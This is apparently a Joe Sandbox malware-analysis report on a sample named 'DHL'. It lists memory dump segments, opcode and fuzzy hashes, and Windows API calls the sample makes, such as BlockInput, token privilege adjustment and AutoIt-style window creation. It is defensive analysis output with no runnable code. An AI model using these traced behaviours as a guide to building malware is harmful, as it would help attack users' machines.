                                                        • CloseHandle.KERNEL32(?,?,00A011FC), ref: 00A010E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: c18cc930e692d55217c5df2a9666a0caecab33adec77b6302cae1613942fd9fd
                                                        • Instruction ID: ea48c13a0ea0cdbcbf3034c2e552d876c05c41d21e412abcd878948f3e59e133
                                                        • Opcode Fuzzy Hash: c18cc930e692d55217c5df2a9666a0caecab33adec77b6302cae1613942fd9fd
                                                        • Instruction Fuzzy Hash: C1E04F32004600AEE7252B51FD05FB377E9EB04320F10882DF4A5804B1DB62ACA0DB10
                                                        Strings
                                                        • Variable is not of type 'Object'., xrefs: 009F0C40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Variable is not of type 'Object'.
                                                        • API String ID: 0-1840281001
                                                        • Opcode ID: 59ece41b7fd1d619e932e069184fc19eb385d6a7c144fa15541ca91d33954b6a
                                                        • Instruction ID: 50066d96f364867249af2f58549999d90e64b78a6b44d6c3c8ac1f6ac4ca3f7b
                                                        • Opcode Fuzzy Hash: 59ece41b7fd1d619e932e069184fc19eb385d6a7c144fa15541ca91d33954b6a
                                                        • Instruction Fuzzy Hash: A5326AB0900218DFCF14DF94C985BEDB7B9BF86318F248459E906AF292D735AD45CBA0
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009D6766,?,?,00000008,?,?,009DFEFE,00000000), ref: 009D6998
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: e5445e6277fa9926067ba9598e2558cc684087368c27a30f23054de9b2757719
                                                        • Instruction ID: 19a6281461b583783f89cca6cfd6e9e614dc6137faff2b5e1ec5dcc6188b4346
                                                        • Opcode Fuzzy Hash: e5445e6277fa9926067ba9598e2558cc684087368c27a30f23054de9b2757719
                                                        • Instruction Fuzzy Hash: 9AB128316506099FD719CF28C48AB657BA0FF45364F29C65AE8D9CF3A2C339E991CB40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 85120841eb21ba4af2b407a7766e7849edf8de168080a56a1a651014bb78b655
                                                        • Instruction ID: f639fa57e503205eb3f6082718789a415e5b059e15c30c53b09c195b43b5c66f
                                                        • Opcode Fuzzy Hash: 85120841eb21ba4af2b407a7766e7849edf8de168080a56a1a651014bb78b655
                                                        • Instruction Fuzzy Hash: 8A126E759002299FCB64CF58C9807FEB7F5FF48710F14819AE949EB291EB749A81CB90
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00A1EABD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: 516212c2b8d43f0c25ebc0f829ab12d123075fa1e0d3fff7d02cdd3a54a55984
                                                        • Instruction ID: 5c437e36eefc2f86cb3df6c74432c8b7469d39deb408dabf4af411dfbbda3c0d
                                                        • Opcode Fuzzy Hash: 516212c2b8d43f0c25ebc0f829ab12d123075fa1e0d3fff7d02cdd3a54a55984
                                                        • Instruction Fuzzy Hash: AFE04F322002049FC710EF69D905E9AF7E9AF997B0F008416FC4ADB351DB70E8818BD1
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009C03EE), ref: 009C09DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: bb209b28b143d14d7cde1bb5549ae2e85604e5a83c9e587f6e65e1438f51c890
                                                        • Instruction ID: 76c551e81fa9f2946658618857f992fae52031b1fa563635d05775ffdc163e0e
                                                        • Opcode Fuzzy Hash: bb209b28b143d14d7cde1bb5549ae2e85604e5a83c9e587f6e65e1438f51c890
                                                        • Instruction Fuzzy Hash:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                        • Instruction ID: 71780cd517b49e42927a0beda88b27cbd10a7fad76c105791b463e5ab0de6505
                                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                        • Instruction Fuzzy Hash: 09516961E0C6056BDF3885E888D9FBFE79D9B52340F18090DEA82D7282C625DE01DF53
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5bb2cb182f96c97a41577abe011bd9185a3a19a917dbad224dfef993e7c58bb
                                                        • Instruction ID: 9d701cf5c12ac8b0ef5c90c330841461b294e9ad47d03d2e039e0077d393924d
                                                        • Opcode Fuzzy Hash: d5bb2cb182f96c97a41577abe011bd9185a3a19a917dbad224dfef993e7c58bb
                                                        • Instruction Fuzzy Hash: FF32322AD68F014DD7239674D822335A64DAFF73C5F55C737F81AB5AA6EB2AC4834200
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e45d454b110f159f15a8681d732f2593279d7d7856c9492de00f5643939e4491
                                                        • Instruction ID: bac3c325f770df3fa4ed1a75ddded7cd2b7d21eb5a63ea1925ccc78ebdc2d466
                                                        • Opcode Fuzzy Hash: e45d454b110f159f15a8681d732f2593279d7d7856c9492de00f5643939e4491
                                                        • Instruction Fuzzy Hash: 8D3239F2A0410D8BDF28CF28C6906BD7BA5EB45311F28C96AD69ADB295D334DD81DB40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6fd6bdfb90406e02fd9666c72a081e0bba5c14d4f01b47102f0759f9bae3ab1
                                                        • Instruction ID: 3fd18455c3f28f5d7faac266b6a4d89bc577e1a186a74ed1d1e802d9fc23bd6c
                                                        • Opcode Fuzzy Hash: f6fd6bdfb90406e02fd9666c72a081e0bba5c14d4f01b47102f0759f9bae3ab1
                                                        • Instruction Fuzzy Hash: CC22A0B0A0460AEFDF14CFA5C982BAEF3B5FF45304F104529E816A7291EB399D11CB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00b01d5e18f6e9a65e9e4f9c30c77e1163e68f74297d875448611b0a3f284a3f
                                                        • Instruction ID: 8c24d5093cb75de24a48fbb15d4f841bd8c3664da2e8423cd5128e6a2ca904a7
                                                        • Opcode Fuzzy Hash: 00b01d5e18f6e9a65e9e4f9c30c77e1163e68f74297d875448611b0a3f284a3f
                                                        • Instruction Fuzzy Hash: A602B3B1E0010AEBCF05DF65D981BAEB7B5FF44300F208569E8169B291EB35AE11CBD1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                        • Instruction ID: b5e2df07672110819022d441fcbc0d212051efc2ab2ea840c1544feefc21e720
                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                        • Instruction Fuzzy Hash: C09199729080A34ADB2D463E8574A3DFFE55A533A131A079DE4F3CB1C2FE24C964D625
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                        • Instruction ID: 40a34194e21b1035b22f3ee0d887f1fd68069954147deddf1415a6c6b042a0fd
                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                        • Instruction Fuzzy Hash: FB91C932A090E34EDB2D427A847493DFFE54A933A1319079DD4F2CA1C7FD24CA64DA25
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f50710b0374cc4058883857c636dd98fd51f8094d73d1b316f9fcb32888f5f15
                                                        • Instruction ID: 55c66f5e026ecaa1493d4a43c21e0a11ffbda25878e3410f005ee5622fac5dc9
                                                        • Opcode Fuzzy Hash: f50710b0374cc4058883857c636dd98fd51f8094d73d1b316f9fcb32888f5f15
                                                        • Instruction Fuzzy Hash: 6D615871E4870967DB349AE88995FBFE39CDF81710F100D1EE882DB281D6159E428F17
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93b8afa9fccf412d1056dd66e786b8226ee43d6d29a65661ec2ac74e0946eda8
                                                        • Instruction ID: e6d7b5fff039e736fbfa7ccef868e63d8aa918a983e4f6ab260f0eef46cc2e54
                                                        • Opcode Fuzzy Hash: 93b8afa9fccf412d1056dd66e786b8226ee43d6d29a65661ec2ac74e0946eda8
                                                        • Instruction Fuzzy Hash: E4616932E0870967DA385AE84856FBFE39CAF82740F100D5DE843CB2D1D6159D42CE57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                        • Instruction ID: 4f487661bc97215155fad7f049daba6dace57028acf66838e334ad76dbc5750b
                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                        • Instruction Fuzzy Hash: 0F81887690C0A34ADB2D42398534A3EFFE55E933A131A079ED4F2CB1C3EE24C654E625
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction ID: 4eab386399c27f66f55eb8b351eae8c3c60665b1d43963e1fdb9589deb78f19d
                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction Fuzzy Hash: 7441B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6840c909bbc6c4d87ca249d0c9c3db13d5ea77c1221b346cc4fc683f0c2c52e9
                                                        • Instruction ID: bc06f2b23f61bac633d92f11eb999771b8e766f1d292785f29d09116f075b877
                                                        • Opcode Fuzzy Hash: 6840c909bbc6c4d87ca249d0c9c3db13d5ea77c1221b346cc4fc683f0c2c52e9
                                                        • Instruction Fuzzy Hash: D82193326206118BD728CF79C8227BA73E5E754310F15862EE4A7C37D1DE39AD44CB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction ID: fa1ee292925143d8fa0991837cbe6ac7bbed61b2bf6f8ec20f0e61d9bed2bc59
                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction Fuzzy Hash: C3014278A01209EFCB44DF98C5909AEF7F6FB48310F209599E819A7745D730AE91DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction ID: 4c88f4147b60a583ab5f2b5de068dcc23e1207f8ba004ac5528faa8644893b66
                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction Fuzzy Hash: 99019D78A00209EFCB58DF98C5909AEF7F5FB88310F208599E819A7705D730AE91DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00A22B30
                                                        • DeleteObject.GDI32(00000000), ref: 00A22B43
                                                        • DestroyWindow.USER32 ref: 00A22B52
                                                        • GetDesktopWindow.USER32 ref: 00A22B6D
                                                        • GetWindowRect.USER32(00000000), ref: 00A22B74
                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A22CA3
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A22CB1
                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22CF8
                                                        • GetClientRect.USER32(00000000,?), ref: 00A22D04
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A22D40
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22D62
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22D75
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22D80
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A22D89
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22D98
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00A22DA1
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22DA8
                                                        • GlobalFree.KERNEL32(00000000), ref: 00A22DB3
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22DC5
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A3FC38,00000000), ref: 00A22DDB
                                                        • GlobalFree.KERNEL32(00000000), ref: 00A22DEB
                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A22E11
